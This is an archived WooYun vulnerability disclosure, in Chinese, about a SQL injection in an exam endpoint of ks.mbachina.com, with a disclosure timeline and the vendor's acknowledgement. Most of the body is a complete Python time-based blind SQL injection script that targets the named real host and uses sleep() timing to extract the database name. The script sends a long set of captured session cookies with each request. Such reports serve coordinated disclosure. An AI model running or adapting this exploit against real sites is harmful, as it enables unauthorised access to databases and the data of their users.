乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-02: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
修复不当,修了以后,sqlmap的确跑不出来了。sleep时间自己改,服务很容易就504了。-----------[Done]MySQL user is mbaexam-----------
import httplibimport timeimport urllibimport urllib2import sysimport randomfrom time import sleeppayloads = list('dedmbacxsehverabcdefghijklmnopqrstuvwxyz@_.0123456789')base_url = "/ucenter/exam/getQuesList"database = ''def sql(): post_data={"num":"15","PaperID":"92","title":"%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3","type":"radio","quesids":"a"} for i in range(1,10): for payload in payloads: sleep(10) data2 = "(select(0)from(select(sleep(ascii(mid(database(),%d,1))-%d)))x)" % (i,ord(payload)) post_data["quesids"] = data2 data=urllib.urlencode(post_data) headers = {"User-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21", "Accept": "*/*", "Referer": "ks.mbachina.com", "Content-Length":"143", "X-Requested-With": "XMLHttpRequest", "Accept-Encoding" : "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Host": "ks.mbachina.com", "Cookie":"_sid=f160eb804c57e011dcc5160e61b5adf3410b599d; _i=%2Fx4a8qmEWqzWf0JVfZb4LbnexT5SGeS%2FYLiDG3NBdAR%2Bo2wSHJLVTA%3D%3D_df54f676c3d4530776ae5b86bc275047_1446692677; _l=1446692494; _178c=36281005%23%23testby; _e=31536000; CNZZDATA30044938=cnzz_eid%3D757341134-1446690162-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1446690162; lzstat_uv=2440368293235315611|3; lzstat_ss=712204841_6_1447188375_3; lstat_bc=1514100093928880260; 6c3ae_lastpos=other; 6c3ae_ck_info=%2F%09; 6c3ae_winduser=VVMEAgIDCTECBlQOXwVVAQNRVwYJVlFVCQEKCAcHWFdQAgQAVVNTVD0%3D; _ystat_style=grey; ali_apache_id=182.92.253.28.1447213753471.996202.8; xman_us_f=x_l=1&x_locale=en_US&no_popup_today=n&x_user=US|cena|john|ifm|744887430&last_popup_time=1447222793563; intl_locale=en_US; aep_usuc_f=site=glo®ion=CN&b_locale=en_US&isb=y&isfm=y&c_tp=USD®_ver=new; xman_t=QMHin9sVRY0/eDovjFU3qkj7GD8VeVeZJDMunRqt5ivD4El/8Chd5cMsE78C7jHXT1r04qIB+JwdxnYExnyX4tKxPGJ6Xn8i3T5As0PbaTauJauQiGfiHFmTkdQG8kg6RzaHkdWYV6wTc1q2+3hlSHxt500rtzXvM41cTn9cK8RW3DqQ9UdOZzqXTTMkpj7bwr2Zm4mui+D5JQa3FQYvDfgJN0Goq0u3RXwGMR0eydyYXl1qzUV2JDwhfe9DZ1lUFRRtZ3+HmUpIs8kxg906+0FBONRcFOvpI2a+bG+724iiDjSQVy7TXRimUepQC1OIW9fI0eNr1UCz35BEi63u0xUEL+s9CbGw3qIMPKhPyWLor8PtaF4yVAhaCSG0cVzTB8bZD9wMDfhA6edf7Q8Q5zarh1AcILHEuopC44NHyMP//xaHFOXBKcLpuJZLNfGHcwK7QKiry0TBmqC70m9d+8UGmRZsbvFDPDx+K4yTS3yUP5LoH1lC4u5mu6/0EsNHwwgdPvE2vgi+cjOz1hBEYHBrvYFDKCDQZgkBYfap/YvbRDE0NKqXU0trwZLNwR1mplLdYEWeCZLO2JN+KvTxvoizgBokrFIMtfandCMbhKkLiijGZdXQqg==; acs_usuc_t=acs_rt=1ca442554e664f4e95f51dea19820746; intl_common_forever=vS/UslZJX1ujWRRwfsCPfl20zxquyCDw5yQboXfI9OtkQoToTKqo1g==; xman_f=wEVqhH+b+eAR46kvyKARt/oHftT2h6y5ipD+6sjZ9GYmr/Tr+EkQAo+WaYFtZbSHlyqVnNAMvg3VUUBmgidINn2hE/MRdTNR5jJV94TZSQWL2AWP4rwgfVCw4MrcqKyozdB5IjA1FfDv6jYbWh2bfP+5Mjd8EGClZJWA4cDkCC8R4v29HJV/7liC+/CxQhNeT1bG3SiTdQxihGRPrSo6Jktbb5F9UUSMMnuVuBwzqiYTw6JMdkMf+2E2GW67Z6iIGly7gh/1LJ6oqYfD0QVEunnDVY2a3WsxAS/e4NdfJagYx48P3GD2l2oRBYLFcq7XJCFrudnvut2KlHYXT/yGvL5AVLKIxPQFW+Gu1SLwX9W9KhNwvexJnhK40QRBCargRNYYKEvba0g=; ali_beacon_id=182.92.253.28.1447213753471.996202.8; cna=qlA/DuKa3k0CAbZc/RwKyHZQ; __utma=3375712.381681950.1447213757.1447213757.1447222530.2; __utmc=3375712; __utmz=3375712.1447213757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); l=AiwseRMhzL09SxTDNl0-hfWi3AFeVdCP; ali_apache_track=mt=1|ms=|mid=us1125640758ctnk; ali_apache_tracktmp=W_signed=Y; PHPSESSID=90577438460ab02245f9bfdff6d68c7b; CNZZDATA1408427=cnzz_eid%3D288945677-1448603092-http%253A%252F%252Fwww.qq.com%252F%26ntime%3D1448603092"} try: now_time = time.time() conn = httplib.HTTPConnection("ks.mbachina.com",timeout=5) conn.request('POST', base_url, data, headers) data3 = conn.getresponse().read() except: print ".", if time.time() - now_time < 1: global database database += payload print '\r[In Progress]' + database else: print ".",if __name__ == "__main__": sql() print '\n[Done]MySQL user is ' + database
~~
危害等级:低
漏洞Rank:4
确认时间:2015-12-07 18:52
非常感谢您,问题已着手处理,感谢您对我们安全工作的关注。
暂无